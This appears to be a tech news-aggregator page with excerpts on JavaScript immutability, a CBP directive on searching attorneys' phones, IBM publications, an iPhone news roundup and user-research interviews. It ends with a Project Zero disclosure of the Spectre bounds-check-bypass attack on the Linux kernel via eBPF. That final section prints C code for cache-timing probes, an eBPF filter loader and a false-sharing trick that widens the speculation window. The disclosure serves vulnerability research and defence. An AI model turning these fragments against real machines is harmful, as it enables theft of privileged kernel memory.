    volume: 50,
    bass: 20
  }
};

Object.freeze(defaultSettings);
defaultSettings.soundSettings.bass = 100;

// soundSettings gets mutated nevertheless
console.log(defaultSettings);
// {
//   power: true,
//   soundSettings: {
//     volume: 50,
//     bass: 100
//   }
// }

To prevent a deep mutation, you can use a library called deep-freeze, which recursively calls Object.freeze on all objects.

const defaultSettings = {
  power: true,
  soundSettings: {
    volume: 50,
    bass: 20
  }
};

// Performing a deep freeze (after including deep-freeze in your code per instructions on npm)
deepFreeze(defaultSettings);

// Attempting to change deep properties will fail silently
defaultSettings.soundSettings.bass = 100;

// soundSettings doesn't get mutated anymore
console.log(defaultSettings);
// {
//   power: true,
//   soundSettings: {
//     volume: 50,
//     bass: 20
//   }
// }

Don’t confuse reassignment with mutation

When you reassign a variable, you change what it points to. In the following example, a is changed from 11 to 100.

let a = 11;
a = 100;

When you mutate an object, it gets changed. The reference to the object stays the same.

const egg = { name: "Humpty Dumpty" };
egg.isBroken = false;

Wrapping up

Mutation is scary because it can cause your code to break without your knowing about it. Even if you suspect the cause of breakage is a mutation, it can be hard for you to pinpoint the code that created the mutation. So the best way to prevent code from breaking unknowingly is to make sure your objects don’t mutate from the get-go.

To prevent objects from mutating, you can use libraries like ImmutableJS and Mori.js, or use Object.assign and Object.freeze.

Take note that Object.assign and Object.freeze can only prevent direct properties from mutating. If you need to prevent multiple layers of objects from mutating, you’ll need libraries like assignment and deep-freeze.

Categories: Technology

New Customs and Border Protection policy on searching attorney iPhones

iPhone J.D. - Mon, 01/08/2018 - 22:51

In mid-2017, I discussed some of the risks associated with attorneys bringing an iPhone or iPad when traveling internationally because U.S. customs agents have been demanding to search mobile devices upon reentry into the country.  Yesterday, Sophia Cope and Aaron Mackey, staff attorneys with the Electronic Frontier Foundation (EFF), reported that Customs and Border Protection (CBP) has released a new directive:  CBP Directive No. 3340-049A (Jan. 4, 2018) titled Border Search of Electronic Devices.  The full EFF report provides details on how this affects all U.S. citizens, but today I want to focus on one small part of the new directive, the part that deals with privileged information on an attorney's iPhone or iPad.

Under the new directive (which you can download here in PDF format), there are now new procedures that a border patrol agent must use when confronted with data protected by the attorney-client privilege or work product.  The good news is that once an attorney asserts the privilege, the CBP Associate/Assistant Chief Counsel office needs to get involved; the border patrol agent cannot decide on his own to ignore the assertion of privilege.  Having said that, it looks like the attorney needs to all but provide a full privilege log to CBP, and even then it is unclear how CBP will deal with the privileged information.  The policy says that it will be "handled appropriately while also ensuring that CBP accomplishes its critical border security mission."  Section 5.2.1.2.  Here is the new policy:

5.2 Review and Handling of Privileged or Other Sensitive Material

5.2.1    Officers encountering information they identify as, or that is asserted to be, protected by the attorney-client privilege or attorney work product doctrine shall adhere to the following procedures.

5.2.1.1    The Officer shall seek clarification, if practicable in writing, from the individual asserting this privilege as to specific files, file types, folders, categories of files, attorney or client names, email addresses, phone numbers, or other particulars that may assist CBP in identifying privileged information.

5.2.1.2    Prior to any border search of files or other materials over which a privilege has been asserted, the Officer will contact the CBP Associate/Assistant Chief Counsel office.  In coordination with the CBP Associate/Assistant Chief Counsel office, which will coordinate with the U.S. Attorney's Office as needed, Officers will ensure the segregation of any privileged material from other information examined during a border search to ensure that any privileged material is handled appropriately while also ensuring that CBP accomplishes its critical border security mission. This segregation process will occur through the establishment of a Filter Team composed of legal and operational representatives, or through another appropriate measure with written concurrence of the CBP Associate/Assistant Chief Counsel office.

5.2.1.3    At the completion of the CBP review, unless any materials are identified that indicate an imminent threat to homeland security, copies of materials maintained by CBP and determined to be privileged will be destroyed, except for any copy maintained in coordination with the CBP Associate/Assistant Chief Counsel office solely for purposes of complying with a litigation hold or other requirement of law.

5.2.2    Other possibly sensitive information, such as medical records and work-related information carried by journalists, shall be handled in accordance with any applicable federal law  and CBP policy. Questions regarding the review of these materials shall be directed to the CBP Associate/Assistant Chief Counsel office, and this consultation shall be noted in appropriate CBP systems.

5.2.3    Officers encountering business or commercial information in electronic devices shall treat such information as business confidential information and shall protect that information from unauthorized disclosure. Depending on the nature of the information presented, the Trade Secrets Act, the Privacy Act, and other laws, as well as CBP policies, may govern or restrict the handling of the information. Any questions regarding the handling of business or commercial information may be directed to the CBP Associate/Assistant Chief Counsel office or the CBP Privacy Officer, as appropriate.

5.2.4    Information that is determined to be protected by law as privileged or sensitive will only be shared with agencies or entities that have mechanisms in place to protect appropriately such information, and such information will only be shared in accordance with this Directive.

I'm glad to see that CBP is acknowledging that there is a need to provide heightened protection for confidential information on an attorney's mobile device.  However, any attorney dealing with this new provision will need to do a lot of work, and if you have a short window before your connecting flight, I suspect that you are going to miss that connection.

Categories: iPhone Web Sites

IBM FlashSystem A9000 and A9000R, IBM XIV, and IBM Spectrum Accelerate with IBM SAN Volume Controller Best Practices

IBM Redbooks Site - Mon, 01/08/2018 - 08:30
Redpaper, published: Mon, 8 Jan 2018

This IBM® Redpaper™ publication describes preferred practices for attaching members of the IBM Spectrum™ Accelerate family, including the IBM XIV® Gen3 Storage System, IBM FlashSystem® A9000, IBM FlashSystem A9000R, and other IBM Spectrum Accelerate™ based deployments, to either an IBM System Storage® SAN Volume Controller or IBM Storwize® V7000 system.

Categories: Technology

In the news

iPhone J.D. - Fri, 01/05/2018 - 01:05

Happy New Year!  I hope that you and your family had a wonderful holiday season and have managed to stay warm during this crazy cold weather.  I know that Apple and many app developers certainly enjoyed the season because Apple announced yesterday that the App Store had a record-breaking holiday season.  There were $300 million in purchases on New Year's Day, and $890 million in purchases during the week starting on Christmas Eve.  Apple VP Phil Schiller announced that "[i]n 2017 alone, iOS developers earned $26.5 billion — more than a 30 percent increase over 2016."  And since the App Store launched in July 2008, iOS developers have earned over $86 billion.  And now, the news items of note from the end of the year and early 2018:

  • California attorney David Sparks reviews Best Photos, an app that can help you sort and prune through the photos on your iPhone.
  • Sparks also discusses iCloud syncing.  Sparks mentioned on a recent Mac Power Users podcast that he is now relying almost exclusively on iCloud for his document management, with just rare use of Dropbox.
  • For a very long time (well over a year), my favorite iPhone weather app was Weather Line.  A few months ago I changed to Carrot Weather, which I really like (not only on the iPhone, but also on the Apple Watch where Carrot Weather is my favorite third party Apple Watch app).  However, Zac Hall of 9to5Mac reports that Weather Line was updated this week and now supports the iPhone X, so I'll have to check in again on that old favorite.
  • Jon Chase of Wirecutter has a round up of some of the best HomeKit-compatible smart-home devices.  There are quite a few good ones on that list, but my personal favorite is the Lutron Caséta line.
  • Cliff Kuang of Fast Company Design discusses the 12,000 chairs that Apple purchased for its new Apple Park campus.
  • John Gruber of Daring Fireball discusses ways that Apple can improve the feature where you press the side button on an iPhone X to confirm a purchase.
  • Gruber also has a good overview of what makes the iPhone X so amazing.
  • Here is iMore's roundup of the best devices, accessories and apps of 2017.
  • Jason Snell of Six Colors explains how to use Workflow (on an iPhone) and Hazel (on a Mac) to turn your iPhone into a remote control for your Mac.
  • If you are planning a trip to New Orleans this year, Brett Anderson, food critic for the Times-Picayune, posted his 10 favorite restaurants in New Orleans for 2018.  It's a fabulous list, and Commander's Palace is my #1 choice.  But picking just 10 means that he left off many other great ones — Galatoire's, Shaya, Dante's Kitchen, Emeril's, Meril, Restaurant August, and many more that I won't name because now I'm getting hungry.
  • And finally, it has been a long time since I have watched one of the drone videos of the new Apple Park campus, and Matthew Roberts made one just a few weeks ago that is of really high quality and shows off a lot of features that I hadn't seen yet:

Categories: iPhone Web Sites

Discovery on a Budget: Part I

A list Apart development site - Thu, 01/04/2018 - 10:00

If you crack open any design textbook, you’ll see some depiction of the design cycle: discover, ideate, create, evaluate, and repeat. Whenever we bring on a new client or start working on a new feature, we start at the top of the wheel with discover (or discovery). It is the time in the project when we define what problem we are trying to solve and what our first approach at solving it should be.

Ye olde design cycle

We commonly talk about discovery at the start of a sprint cycle at an established business, where there are things like budgets, product teams, and existing customers. The discovery process may include interviewing stakeholders or poring over existing user data. And we always exit the discovery phase with some sort of idea to move forward with.

However, discovery is inherently different when you work at a nonprofit, startup, or fledgling small business. It may be a design team of one (you), with zero dollars to spend, and only a handful of people aware the business even exists. There are no clients to interview and no existing data to examine. This may also be the case at large businesses when they want to test the waters on a new direction without overcommitting (or overspending). Whenever you are constrained on budget, data, and stakeholders, you need to be flexible and crafty in how you conduct discovery research. But you can’t skimp on rigor and thoroughness. If the idea you exit the discovery phase with isn’t any good, your big launch could turn out to be a business-ending flop.

In this article I’ll take you through a discovery research cycle, but apply it towards a (fictitious) startup idea. I’ll introduce strategies for conducting discovery research with no budget, existing user data, or resources to speak of. And I’ll show how the research shapes the business going forward.

Write up the problem hypothesis

An awful lot of ink (virtual or otherwise) has been spent on proclaiming we should all, “fall in love with the problem, not the solution.” And it has been ink spent well. When it comes to product building, a problem-focused philosophy is the cornerstone of any user-centric business.

But how, exactly, do you know when you have a problem worth solving? If you work at a large, established business you may have user feedback and data pointing you like flashing arrows on a well-marked road towards a problem worth solving. However, if you are launching a startup, or work at a larger business venturing into new territory, it can be more like hiking through the woods and searching for the next blaze mark on the trail. Your ideas are likely based on personal experiences and gut instincts.

When your ideas are based on personal experiences, assumptions, and instincts, it’s important to realize they need a higher-than-average level of tire-kicking. You need to evaluate the question “Do I have a problem worth solving?” with a higher level of rigor than you would at a company with budget to spare and a wealth of existing data. You need to take all of your ideas and assumptions and examine them thoroughly. And the best way to examine your ideas and categorize your assumptions is with a hypothesis.

As the dictionary describes, a hypothesis is “a supposition or proposed explanation made on the basis of limited evidence as a starting point for further investigation.” That also serves as a good description of why we do discovery research in the first place. We may have an idea that there is a problem worth solving, but we don’t yet know the scope or critical details. Articulating our instincts, ideas, and assumptions as a problem hypothesis lays a foundation for the research moving forward.

Here is a general formula you can use to write a problem hypothesis:

Because [assumptions and gut instincts about the problem], users are [in some undesirable state]. They need [solution idea].

For this article, I decided to “launch” a fictitious (and overly ambitious) startup as an example. Here is the problem hypothesis I wrote for my startup:

Because their business model relies on advertising, social media tools like Facebook are deliberately designed to “hook” users and make them addicted to the service. Users are unhappy with this and would rather have a healthier relationship with social media tools. They would be willing to pay for a social media service that was designed with mental health in mind.

You can see in this example that my assumptions are:

  • Users feel that social media sites like Facebook are addictive.
  • Users don’t like to be addicted to social media.
  • Users would be willing to pay for a non-addictive Facebook replacement.

These are the assumptions I’ll be researching and testing throughout the discovery process. If I find through my research that I cannot readily affirm these assumptions, it means I might not be ready to take on Mr. Zuckerberg just yet.

The benefit of articulating our assumptions in the form of a hypothesis is that it provides something concrete to talk about, refer to, and test. The whole product team can be involved in forming the initial problem hypothesis, and you can refer back to it throughout the discovery process. Once we’ve completed the research and analyzed the results, we can edit the hypothesis to reflect our new understanding of our users and the problems we want to solve.

Now that we’ve articulated a problem hypothesis, it is time to figure out our research plan. In the following two sections, I’ll cover the research method I recommend the most for new ventures, as well as strategies for recruiting participants on a budget.

A method that is useful in all phases of design: interviews

In my career as a user researcher, I have used all sorts of methods. I’ve done A/B testing, eye tracking, Wizard of Oz testing, think-alouds, contextual inquiries, and guerilla testing. But the one research method I utilize the most, and that I believe provides the most “bang for the buck,” is user interviews.

User interviews are relatively inexpensive to conduct. You don’t need to travel to a client site and you don’t need a fortune’s worth of equipment. If you have access to a phone, you can conduct an interview with participants all around the world. Yet interviews provide a wealth of information and can be used in every phase of research and design. Interviews are especially useful in discovery, because it is a method that is adaptable. As you learn more about the problem you are trying to solve, you can adapt your interview protocol to match.

To be clear, your interviewees will not tell you:

  • what to build;
  • or how to build it.

But they absolutely can tell you:

  • what problem they have;
  • how they feel about it;
  • and what the value of a solution would mean to them.

And if you know the problem, how users feel about it, and the value of a solution, you are well on your way to designing the right product.

The challenge of conducting a good user interview is making sure you ask the questions that elicit that information. Here are a couple of tips:

Tip 1: always ask the following two questions:

  • “What do you like about [blank]?”
  • “What do you dislike about [blank]?”

… where you fill “[blank]” with whatever domain your future product will improve.

Your objective is to gain an understanding of all aspects of the problem your potential customers face—the bad and the good. One common mistake is to spend too much time investigating what’s wrong with the current state of affairs. Naturally, you want your product to fix all the problems your customers face. However, you also need to preserve what currently works well, what is satisfying, or what is otherwise good about how users accomplish their goals currently. So it is important to ask about both in user interviews.

For example, in my interviews I always asked, “What do you like about using Facebook?” And it wasn’t until my interview participant told me everything they enjoyed about Facebook that I would ask, “What do you dislike about using Facebook?”

Tip 2: after (nearly) every response, ask them to say more.

The goal of conducting interviews is to gain an exhaustive set of data to review and consider moving forward. That means you don’t want your participants to discuss just one thing they like and dislike; you want them to tell you all the things they like and dislike.

Here is an example of how this played out in one of the interviews I conducted:

Interviewer (Me): What do you like about using Facebook?

Interviewee: I like seeing people on there that I wouldn’t otherwise get a chance to see and catch up with in real life. I have moved a couple times so I have a lot of friends that I don’t see regularly. I also like seeing the people I know do well, even though I haven’t seen them since, maybe, high school. But I like seeing how their life has gone. I like seeing their kids. I like seeing their accomplishments. It’s also a little creepy because it’s a window into their life and we haven’t actually talked in forever. But I like staying connected.

Interviewer (Me): What else do you like about it?

Interviewee: Um, well it’s also sort of a convenient way of keeping contacts. There have been a few times when I was able to message people and get in touch with people even when I don’t have their address or email in my phone. I could message them through Facebook.

Interviewer (Me): Great. Is there anything else you like about it?

Interviewee: Let me think … well I also find cool stuff to do on the weekends there sometimes. They have an events feature. And businesses, or local places, will post events and there have been a couple times where I’ve gone to something cool. Like I found a cool movie festival once that way.

Interviewer (Me): That seems cool. What else do you like about using Facebook?

Interviewee: Uh … that’s all I think I really use it for. I can’t really think of anything else. Mainly I use it just to keep in touch with people that I’ve met over the years.

From this example you can see the first feature that popped into the interviewee’s mind was their ability to keep up with friends that they otherwise wouldn’t have much opportunity to connect with anymore. That is a feature that any Facebook replacement would have to replicate. However, if I hadn’t pushed the interviewee to think of even more features they like, I might have never uncovered an important secondary feature: convenient in-app messaging. In fact, six out of the eleven people I interviewed for this project said they liked Facebook Messenger. But not a single one of them mentioned that feature first. It only came up in conversation after I probed for more.

As I continued to repeat my question, the interviewee thought of one more feature they liked: local event listings. (Five out of the eleven people I interviewed mentioned this feature.) But after that, the interviewee couldn’t think of any more features to discuss. You know you can move on to the next question in the interview when your participant starts to repeat themselves or bluntly tells you they have nothing else to say.

Recruit all around you, then document the bias

There are all sorts of ways to recruit participants for research. You can hire an agency or use a tool like UserTesting.com. But many of those paid-for options can be quite costly, and since we are working with a shoestring budget we have roughly zero dollars to spend on recruitment. We will have to be creative.

My post on Facebook to recruit volunteers. One volunteer decided to respond with a Hunger Games “I volunteer as tribute!” gif.

For my project, I decided to rely on the kindness of friends and strangers I could reach through Facebook. I posted one request for participants on my personal Facebook page, and another on the local FreeCodeCamp page. A day after I posted my request, twenty-five friends and five strangers volunteered. This type of participant recruitment method is called convenience sampling, because I was recruiting participants that were conveniently accessible to me.

Since my project involved talking to people about social media sites like Facebook, it was appropriate for my first attempt at recruiting to start on Facebook. I could be sure that everyone who saw my request uses Facebook in some form or fashion. However, like all convenience sampling, my recruitment method was biased. (I’ll explain how in just a bit.)

Bias is something that we should try—whenever possible—to avoid. If we have access to more sophisticated recruitment methods, we should use them. However, when you have a tight budget, avoiding recruitment bias is virtually impossible. In this scenario, our goals should be to:

  • mitigate bias as best we can;
  • and document all the biases we see.

For my project, I could mitigate some of the biases by using a few more recruitment methods. I could go to various neighborhoods and try to recruit participants off the street (i.e., guerilla testing). If I had a little bit of money to spend, I could hang out in various coffee shops and offer folks free coffee in exchange for ten-minute interviews. These recruitment methods also fall under the umbrella of convenience sampling, but by using a variety of methods I can mitigate some of the bias I would have from using just one of them.

Also, it is always important to reflect on and document how your sampling method is biased. For my project, I wrote the following in my notes:

All of the people I interviewed were connected to me in some way on Facebook. Many of them I know well enough to be “friends” with. All of them were around my age, many (but not all) worked in tech in some form or fashion, and all of them but one lived in the US.

Documenting bias ensures that we won’t forget about the bias when it comes time to analyze and discuss the results.

Let’s keep this going

As the title suggests, this is just the first installment of a series of articles on the discovery process. In part two, I will analyze the results of my interviews, revise my problem hypothesis, and continue to work on my experimental startup. I will launch into another round of discovery research, but this time utilizing some different research methods, like A/B testing and fake-door testing. You can help me out by checking out this mock landing page for Candor Network (what I’ve named my fictitious startup) and taking the survey you see there.

Categories: Technology

IBM QRadar Version 7.3 Planning and Installation Guide

IBM Redbooks Site - Thu, 01/04/2018 - 08:30
Redbook, published: Thu, 4 Jan 2018

With the advances of technology and the recurrence of data leaks, cyber security is a bigger challenge than ever before.

Categories: Technology

Reading privileged memory with a side-channel

Google Project Zero - Wed, 01/03/2018 - 17:27
Posted by Jann Horn, Project Zero

We have discovered that CPU data cache timing can be abused to efficiently leak information out of mis-speculated execution, leading to (at worst) arbitrary virtual memory read vulnerabilities across local security boundaries in various contexts.
Variants of this issue are known to affect many modern processors, including certain processors by Intel, AMD and ARM. For a few Intel and AMD CPU models, we have exploits that work against real software. We reported this issue to Intel, AMD and ARM on 2017-06-01 [1].
So far, there are three known variants of the issue:
  • Variant 1: bounds check bypass (CVE-2017-5753)
  • Variant 2: branch target injection (CVE-2017-5715)
  • Variant 3: rogue data cache load (CVE-2017-5754)

Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at:

During the course of our research, we developed the following proofs of concept (PoCs):
  1. A PoC that demonstrates the basic principles behind variant 1 in userspace on the tested Intel Haswell Xeon CPU, the AMD FX CPU, the AMD PRO CPU and an ARM Cortex A57 [2]. This PoC only tests for the ability to read data inside mis-speculated execution within the same process, without crossing any privilege boundaries.
  2. A PoC for variant 1 that, when running with normal user privileges under a modern Linux kernel with a distro-standard config, can perform arbitrary reads in a 4GiB range [3] in kernel virtual memory on the Intel Haswell Xeon CPU. If the kernel's BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU. On the Intel Haswell Xeon CPU, kernel virtual memory can be read at a rate of around 2000 bytes per second after around 4 seconds of startup time. [4]
  3. A PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific (now outdated) version of Debian's distro kernel [5] running on the host, can read host kernel memory at a rate of around 1500 bytes/second, with room for optimization. Before the attack can be performed, some initialization has to be performed that takes roughly between 10 and 30 minutes for a machine with 64GiB of RAM; the needed time should scale roughly linearly with the amount of host RAM. (If 2MB hugepages are available to the guest, the initialization should be much faster, but that hasn't been tested.)
  4. A PoC for variant 3 that, when running with normal user privileges, can read kernel memory on the Intel Haswell Xeon CPU under some precondition. We believe that this precondition is that the targeted kernel memory is present in the L1D cache.

For interesting resources around this topic, look down into the "Literature" section.
A warning regarding explanations about processor internals in this blogpost: This blogpost contains a lot of speculation about hardware internals based on observed behavior, which might not necessarily correspond to what processors are actually doing.
We have some ideas on possible mitigations and provided some of those ideas to the processor vendors; however, we believe that the processor vendors are in a much better position than we are to design and evaluate mitigations, and we expect them to be the source of authoritative guidance.
The PoC code and the writeups that we sent to the CPU vendors will be made available at a later date.

Tested Processors
  • Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (called "Intel Haswell Xeon CPU" in the rest of this document)
  • AMD FX(tm)-8320 Eight-Core Processor (called "AMD FX CPU" in the rest of this document)
  • AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G (called "AMD PRO CPU" in the rest of this document)
  • An ARM Cortex A57 core of a Google Nexus 5x phone [6] (called "ARM Cortex A57" in the rest of this document)
Glossary

retire: An instruction retires when its results, e.g. register writes and memory writes, are committed and made visible to the rest of the system. Instructions can be executed out of order, but must always retire in order.
logical processor core: A logical processor core is what the operating system sees as a processor core. With hyperthreading enabled, the number of logical cores is a multiple of the number of physical cores.
cached/uncached data: In this blogpost, "uncached" data is data that is only present in main memory, not in any of the cache levels of the CPU. Loading uncached data will typically take over 100 cycles of CPU time.
speculative execution: A processor can execute past a branch without knowing whether it will be taken or where its target is, therefore executing instructions before it is known whether they should be executed. If this speculation turns out to have been incorrect, the CPU can discard the resulting state without architectural effects and continue execution on the correct execution path. Instructions do not retire before it is known that they are on the correct execution path.
mis-speculation window: The time window during which the CPU speculatively executes the wrong code and has not yet detected that mis-speculation has occurred.

Variant 1: Bounds check bypass

This section explains the common theory behind all three variants and the theory behind our PoC for variant 1 that, when running in userspace under a Debian distro kernel, can perform arbitrary reads in a 4GiB region of kernel memory in at least the following configurations:
  • Intel Haswell Xeon CPU, eBPF JIT is off (default state)
  • Intel Haswell Xeon CPU, eBPF JIT is on (non-default state)
  • AMD PRO CPU, eBPF JIT is on (non-default state)

The state of the eBPF JIT can be toggled using the net.core.bpf_jit_enable sysctl.

Theoretical explanation

The Intel Optimization Reference Manual says the following regarding Sandy Bridge (and later microarchitectural revisions) in section 2.3.2.3 ("Branch Prediction"):
Branch prediction predicts the branch target and enables the processor to begin executing instructions long before the branch true execution path is known.
In section 2.3.5.2 ("L1 DCache"):
Loads can:[...]
  • Be carried out speculatively, before preceding branches are resolved.
  • Take cache misses out of order and in an overlapped manner.

Intel's Software Developer's Manual [7] states in Volume 3A, section 11.7 ("Implicit Caching (Pentium 4, Intel Xeon, and P6 family processors)"):
Implicit caching occurs when a memory element is made potentially cacheable, although the element may never have been accessed in the normal von Neumann sequence. Implicit caching occurs on the P6 and more recent processor families due to aggressive prefetching, branch prediction, and TLB miss handling. Implicit caching is an extension of the behavior of existing Intel386, Intel486, and Pentium processor systems, since software running on these processor families also has not been able to deterministically predict the behavior of instruction prefetch.

Consider the code sample below. If arr1->length is uncached, the processor can speculatively load data from arr1->data[untrusted_offset_from_caller]. This is an out-of-bounds read. That should not matter because the processor will effectively roll back the execution state when the branch has executed; none of the speculatively executed instructions will retire (e.g. cause registers etc. to be affected).
struct array {
  unsigned long length;
  unsigned char data[];
};
struct array *arr1 = ...;
unsigned long untrusted_offset_from_caller = ...;
if (untrusted_offset_from_caller < arr1->length) {
  unsigned char value = arr1->data[untrusted_offset_from_caller];
  ...
}

However, in the following code sample, there's an issue. If arr1->length, arr2->data[0x200] and arr2->data[0x300] are not cached, but all other accessed data is, and the branch conditions are predicted as true, the processor can do the following speculatively before arr1->length has been loaded and the execution is re-steered:
  • load value = arr1->data[untrusted_offset_from_caller]
  • start a load from a data-dependent offset in arr2->data, loading the corresponding cache line into the L1 cache

struct array {
  unsigned long length;
  unsigned char data[];
};
struct array *arr1 = ...; /* small array */
struct array *arr2 = ...; /* array of size 0x400 */
/* >0x400 (OUT OF BOUNDS!) */
unsigned long untrusted_offset_from_caller = ...;
if (untrusted_offset_from_caller < arr1->length) {
  unsigned char value = arr1->data[untrusted_offset_from_caller];
  unsigned long index2 = ((value&1)*0x100)+0x200;
  if (index2 < arr2->length) {
    unsigned char value2 = arr2->data[index2];
  }
}
After the execution has been returned to the non-speculative path because the processor has noticed that untrusted_offset_from_caller is bigger than arr1->length, the cache line containing arr2->data[index2] stays in the L1 cache. By measuring the time required to load arr2->data[0x200] and arr2->data[0x300], an attacker can then determine whether the value of index2 during speculative execution was 0x200 or 0x300 - which discloses whether arr1->data[untrusted_offset_from_caller]&1 is 0 or 1.
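To make the timing side of this concrete, here is a minimal, illustrative C sketch (not taken from the PoC) of how such a FLUSH+RELOAD measurement might look using x86 intrinsics; the function names, the probe buffer, and the 80-cycle threshold are assumptions that would have to be calibrated on a real machine.

#include <stdint.h>
#include <x86intrin.h>  /* _mm_clflush, _mm_mfence, _mm_lfence, __rdtscp */

/* Flush both candidate lines so that only the one touched during
   mis-speculation comes back cached. */
static void flush_probes(volatile unsigned char *probe) {
  _mm_clflush((const void *)&probe[0x200]);
  _mm_clflush((const void *)&probe[0x300]);
  _mm_mfence();
}

/* Time a single load; a "fast" load means the line was cached.
   The 80-cycle threshold is a placeholder and must be calibrated. */
static int is_cached(volatile unsigned char *probe, unsigned long offset) {
  unsigned int aux;
  _mm_mfence();
  _mm_lfence();
  uint64_t t0 = __rdtscp(&aux);
  (void)probe[offset];          /* the timed load */
  uint64_t t1 = __rdtscp(&aux);
  _mm_lfence();
  return (t1 - t0) < 80;
}

/* After triggering the speculative out-of-bounds access, probing offset
   0x300 (and then 0x200) recovers whether value&1 was 1 or 0. */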
To be able to actually use this behavior for an attack, an attacker needs to be able to cause the execution of such a vulnerable code pattern in the targeted context with an out-of-bounds index. For this, the vulnerable code pattern must either be present in existing code, or there must be an interpreter or JIT engine that can be used to generate the vulnerable code pattern. So far, we have not actually identified any existing, exploitable instances of the vulnerable code pattern; the PoC for leaking kernel memory using variant 1 uses the eBPF interpreter or the eBPF JIT engine, which are built into the kernel and accessible to normal users.
A minor variant of this could be to instead use an out-of-bounds read to a function pointer to gain control of execution in the mis-speculated path. We did not investigate this variant further.

Attacking the kernel

This section describes in more detail how variant 1 can be used to leak Linux kernel memory using the eBPF bytecode interpreter and JIT engine. While there are many interesting potential targets for variant 1 attacks, we chose to attack the Linux in-kernel eBPF JIT/interpreter because it provides more control to the attacker than most other JITs.
The Linux kernel supports eBPF since version 3.18. Unprivileged userspace code can supply bytecode to the kernel that is verified by the kernel and then:
  • either interpreted by an in-kernel bytecode interpreter
  • or translated to native machine code that also runs in kernel context using a JIT engine (which translates individual bytecode instructions without performing any further optimizations)

Execution of the bytecode can be triggered by attaching the eBPF bytecode to a socket as a filter and then sending data through the other end of the socket.
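As a rough illustration of that trigger mechanism (not the attack bytecode itself), the following hedged C sketch loads a trivial, do-nothing socket-filter program through the bpf() syscall, attaches it to one end of a socket pair with SO_ATTACH_BPF, and runs it by writing to the other end; error handling is minimal and the details are assumptions about a typical Linux setup.

#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <linux/bpf.h>

#ifndef SO_ATTACH_BPF
#define SO_ATTACH_BPF 50
#endif

int main(void) {
  /* Trivial filter: r0 = 0; exit.  Real attack bytecode would go here. */
  struct bpf_insn insns[] = {
    { .code = BPF_ALU64 | BPF_MOV | BPF_K, .dst_reg = BPF_REG_0, .imm = 0 },
    { .code = BPF_JMP | BPF_EXIT },
  };
  union bpf_attr attr;
  memset(&attr, 0, sizeof(attr));
  attr.prog_type = BPF_PROG_TYPE_SOCKET_FILTER;
  attr.insns     = (uint64_t)(unsigned long)insns;
  attr.insn_cnt  = sizeof(insns) / sizeof(insns[0]);
  attr.license   = (uint64_t)(unsigned long)"GPL";

  int prog_fd = (int)syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
  if (prog_fd < 0) { perror("BPF_PROG_LOAD"); return 1; }

  int fds[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, fds) < 0) { perror("socketpair"); return 1; }
  if (setsockopt(fds[0], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0) {
    perror("SO_ATTACH_BPF"); return 1;
  }

  /* Every datagram sent to the far end runs the filter in kernel context
     (interpreted or JITed, depending on net.core.bpf_jit_enable). */
  char b = 0;
  write(fds[1], &b, 1);
  return 0;
}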
Whether the JIT engine is enabled depends on a run-time configuration setting - but at least on the tested Intel processor, the attack works independent of that setting.
Unlike classic BPF, eBPF has data types like data arrays and function pointer arrays into which eBPF bytecode can index. Therefore, it is possible to create the code pattern described above in the kernel using eBPF bytecode.
eBPF's data arrays are less efficient than its function pointer arrays, so the attack will use the latter where possible.
Both machines on which this was tested have no SMAP, and the PoC relies on that (but it shouldn't be a precondition in principle).
Additionally, at least on the Intel machine on which this was tested, bouncing modified cache lines between cores is slow, apparently because the MESI protocol is used for cache coherence [8]. Changing the reference counter of an eBPF array on one physical CPU core causes the cache line containing the reference counter to be bounced over to that CPU core, making reads of the reference counter on all other CPU cores slow until the changed reference counter has been written back to memory. Because the length and the reference counter of an eBPF array are stored in the same cache line, this also means that changing the reference counter on one physical CPU core causes reads of the eBPF array's length to be slow on other physical CPU cores (intentional false sharing).
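A hedged sketch of that false-sharing trick in isolation (illustrative only; the structure, field, and function names are made up, and the CPU numbers assume cores 0 and 1 are separate physical cores): a thread pinned to another core keeps one field of a 64-byte-aligned structure dirty, which makes reads of the neighbouring field on the measuring core stall until the line is written back.

#define _GNU_SOURCE
#include <pthread.h>
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>
#include <x86intrin.h>

/* Both fields live in one 64-byte cache line, mimicking an eBPF array whose
   length and reference counter share a line. */
struct shared_line {
  volatile uint64_t refcount;
  volatile uint64_t length;
} __attribute__((aligned(64)));

static struct shared_line line = { .length = 4 };

static void pin_to_cpu(int cpu) {
  cpu_set_t set;
  CPU_ZERO(&set);
  CPU_SET(cpu, &set);
  sched_setaffinity(0, sizeof(set), &set);
}

/* "Bouncer": repeatedly dirties the line on another core. */
static void *bounce(void *arg) {
  (void)arg;
  pin_to_cpu(1);
  for (;;)
    line.refcount++;
  return NULL;
}

int main(void) {
  pin_to_cpu(0);
  pthread_t t;
  pthread_create(&t, NULL, bounce, NULL);
  usleep(100000);  /* let the bouncer start dirtying the line */

  unsigned int aux;
  uint64_t t0 = __rdtscp(&aux);
  (void)line.length;  /* this read now stalls on cache-line ownership */
  uint64_t t1 = __rdtscp(&aux);
  printf("read of length took ~%llu cycles\n", (unsigned long long)(t1 - t0));
  return 0;
}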
The attack uses two eBPF programs. The first one tail-calls through a page-aligned eBPF function pointer array prog_map at a configurable index. In simplified terms, this program is used to determine the address of prog_map by guessing the offset from prog_map to a userspace address and tail-calling through prog_map at the guessed offsets. To cause the branch prediction to predict that the offset is below the length of prog_map, tail calls to an in-bounds index are performed in between. To increase the mis-speculation window, the cache line containing the length of prog_map is bounced to another core. To test whether an offset guess was successful, it can be tested whether the userspace address has been loaded into the cache.
